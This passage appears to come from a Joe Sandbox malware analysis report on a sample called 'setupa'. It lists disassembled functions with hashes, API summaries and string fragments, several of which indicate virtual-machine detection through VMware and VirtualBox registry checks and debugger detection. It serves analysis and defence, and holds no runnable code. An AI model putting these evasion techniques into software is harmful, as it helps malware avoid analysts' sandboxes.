                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c55cc83d1db2e41c6478041d5ecf71c95b1e06df027066bf8306490bc2227a74
                                                                                                              • Instruction ID: cd53177ac0c5e62e7434dc53a3d7cea8e48b128859a11475e40ec9e6d765ee5a
                                                                                                              • Opcode Fuzzy Hash: c55cc83d1db2e41c6478041d5ecf71c95b1e06df027066bf8306490bc2227a74
                                                                                                              • Instruction Fuzzy Hash: C1F1DF22B18A91C5FB208F6590512BD63B1BF59F89F441239EE8D97B89DF3CD886D700
                                                                                                              Function 00007FF68964648D Relevance: .3, Instructions: 339COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d2d1b9c57daaefc40828aa77f88bce61c3ba8f72c3f29eecf61dc64a88a16fe0
                                                                                                              • Instruction ID: dc2c1bcbf93b03ff69349967a5158bb56e5355f4ddbd37c71f17aaaa6c035588
                                                                                                              • Opcode Fuzzy Hash: d2d1b9c57daaefc40828aa77f88bce61c3ba8f72c3f29eecf61dc64a88a16fe0
                                                                                                              • Instruction Fuzzy Hash: 0AE19F62B04B85C5E720DFA1E4506EE27A4FB98B88F414636DF5E93796EF38D285C700
                                                                                                              Function 00007FF689644552 Relevance: .2, Instructions: 202COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7ec2fe9ab7c55efb75ea5d8eec9c4d2881549e1a1771d82f71c2eb84ed0bef62
                                                                                                              • Instruction ID: b738d5c56da2d5d58aad2db6bb544352d41cc75b905af8dcfe794d2592ea9a9c
                                                                                                              • Opcode Fuzzy Hash: 7ec2fe9ab7c55efb75ea5d8eec9c4d2881549e1a1771d82f71c2eb84ed0bef62
                                                                                                              • Instruction Fuzzy Hash: 6E412222B1868982FB258F6594187696791FF46FE5F448239CE5E877C5CE3CE442C300
                                                                                                              Function 00007FF6896469A6 Relevance: .2, Instructions: 195COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 163848160391a1ef943f7f962c6539211572983eeca0e5cced50d2940cb25c5f
                                                                                                              • Instruction ID: d5f8576f2b6b79e256ac933d0513afa93494ab506f4402563a8196f5e80d3b03
                                                                                                              • Opcode Fuzzy Hash: 163848160391a1ef943f7f962c6539211572983eeca0e5cced50d2940cb25c5f
                                                                                                              • Instruction Fuzzy Hash: E941F062B1868986FB2A8F6598297696681FF06FD1F488239DE1E877C5CE3CD442C700
                                                                                                              Function 00007FF6897A84F0 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1e073e0ed49816783ae2e4d1ec1d513d27fbaca5826269479ebc554b8283533f
                                                                                                              • Instruction ID: 9bb0b06fa9f4aafaaf3b7a16b55dda2ef4f110d93f40170121de24370edeeebc
                                                                                                              • Opcode Fuzzy Hash: 1e073e0ed49816783ae2e4d1ec1d513d27fbaca5826269479ebc554b8283533f
                                                                                                              • Instruction Fuzzy Hash: 55D05EABC0EAC249F35109281D252A90BD16F03EE6A09837CCE74AB1C2DE0B5805C304
                                                                                                              Function 00007FF6896424A0 Relevance: 42.2, APIs: 6, Strings: 18, Instructions: 150libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryProc$Free$Load
                                                                                                              • String ID: Inc$.dll$A$GmbH$Key$RegC$RegO$VMwa$Virt$adva$atio$eyEx$inno$lose$penK$pi32$tek $ual
                                                                                                              • API String ID: 3262421712-3616160081
                                                                                                              • Opcode ID: 32aab9f8747e90e5cd36af05437d79586b003251b280e5d9f502dfd3abc97177
                                                                                                              • Instruction ID: b3f6e0ea1ac0aaf21aa24a589310eda3018710e8f3082e7ad84a481d25519e7d
                                                                                                              • Opcode Fuzzy Hash: 32aab9f8747e90e5cd36af05437d79586b003251b280e5d9f502dfd3abc97177
                                                                                                              • Instruction Fuzzy Hash: 58719273A18782C9FB218F65E4416E97760FF507A8F401339EAAD56AD9EF78D184CB00
                                                                                                              Function 00007FF6896422FC Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 407COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CloseHandle$CreateCurrentEventProcess
                                                                                                              • String ID: T
                                                                                                              • API String ID: 258938509-3399717939
                                                                                                              • Opcode ID: 8bde16c420e6d05d19059503116e67d64069cc38bcb120f809834552dcbc2ddc
                                                                                                              • Instruction ID: 64b1e9c080d0d4b9b2c8c6546e42d7839363e185a898b1a02124317a77553c0c
                                                                                                              • Opcode Fuzzy Hash: 8bde16c420e6d05d19059503116e67d64069cc38bcb120f809834552dcbc2ddc
                                                                                                              • Instruction Fuzzy Hash: BE91BD32A08B42C6F710DF65E8542AA33E4FF84B96F50413ADA8D83A64EF3DD596C740
                                                                                                              Function 00007FF689646208 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 150libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$InformationLogicalProcessor$AddressHandleModuleProc
                                                                                                              • String ID: GetLogicalProcessorInformationEx$kernel32.dll
                                                                                                              • API String ID: 3420212499-4102870150
                                                                                                              • Opcode ID: c9eb0fe9f961962842bf6dad6bc3eb56c3c015270d1434286e252ce2ac41614a
                                                                                                              • Instruction ID: 0418173e2a12976150e05db666d7c60f0331afa72fad6de0b46a0e0788836fbb
                                                                                                              • Opcode Fuzzy Hash: c9eb0fe9f961962842bf6dad6bc3eb56c3c015270d1434286e252ce2ac41614a
                                                                                                              • Instruction Fuzzy Hash: 4831B121A08646C1FA14AF61F8550BA63E1BF84FC2F544439D94ED7799DE3CE885C700
                                                                                                              Function 00007FF689644A2A Relevance: 9.1, APIs: 6, Instructions: 82threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebuggerPresent$CloseCreateDebugHandleObjectOutputSingleStringThreadWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 3708507090-0
                                                                                                              • Opcode ID: 6448836cf7e152e16fe49adc507436cdc7d479f4ad33e8b7a7aeda8892aed7e3
                                                                                                              • Instruction ID: 229ac37988527e1bbf5b8f8a053e3fbf1d3be0248c829cb0040f5a56714bd6cd
                                                                                                              • Opcode Fuzzy Hash: 6448836cf7e152e16fe49adc507436cdc7d479f4ad33e8b7a7aeda8892aed7e3
                                                                                                              • Instruction Fuzzy Hash: 1C318331E1CA42C2F6209F65E81017962A0BF89FE2F25023DEA5ED3BD6DE7CE441C640
                                                                                                              Function 00007FF6896424EB Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create$ErrorFileLastObject
                                                                                                              • String ID: CreateFile failed$WARNING: The job `%S` already exists
                                                                                                              • API String ID: 979301819-1099104511
                                                                                                              • Opcode ID: 42060ffb55797cbde83a463c12f12cb6f478dad164c0c92bb815215232cc9f6c
                                                                                                              • Instruction ID: baed039b32158ba4e2068d36f516edf4370323ee4b2aa6ad8b2871a09d3330e6
                                                                                                              • Opcode Fuzzy Hash: 42060ffb55797cbde83a463c12f12cb6f478dad164c0c92bb815215232cc9f6c
                                                                                                              • Instruction Fuzzy Hash: 0C416D32A08642C6FA209F26E8152A9B760FF98FD1F544239EE5D87796DF3CD581CB40
                                                                                                              Function 00007FF689647D2E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 127COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileHeader
                                                                                                              • String ID: MOC$RCC$csm$csm
                                                                                                              • API String ID: 104395404-1441736206
                                                                                                              • Opcode ID: 3a833de7ca52a82ac35dbfba21539507ee4d6f25d5c0b7df1ccdb0255490a833
                                                                                                              • Instruction ID: b3aee3f327cfaf6d53a1433c3836ddcf381fa36a6760eb32e7785acd20572ea9
                                                                                                              • Opcode Fuzzy Hash: 3a833de7ca52a82ac35dbfba21539507ee4d6f25d5c0b7df1ccdb0255490a833
                                                                                                              • Instruction Fuzzy Hash: 4F516872908642C6FB609F51D84136D67A2FF44F96F245039EA8D83799CF3CE881EB41
                                                                                                              Function 00007FF68964240F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$FileWrite
                                                                                                              • String ID: Writ$eFil
                                                                                                              • API String ID: 603252729-742877703
                                                                                                              • Opcode ID: 43eaf5e623fd56909e1d6068382cbeacd74c7ffa1bd459052dcf470b9496c436
                                                                                                              • Instruction ID: 3840abf6775cdef3e8805706793bf277d251df23e17c7f731a33affbf124253d
                                                                                                              • Opcode Fuzzy Hash: 43eaf5e623fd56909e1d6068382cbeacd74c7ffa1bd459052dcf470b9496c436
                                                                                                              • Instruction Fuzzy Hash: 29118C32B48A02C9FB20DF75E8543EE23A0BF44B99F440239DA1D966D8EF38D549C304
                                                                                                              Function 00007FF68973CC0C Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
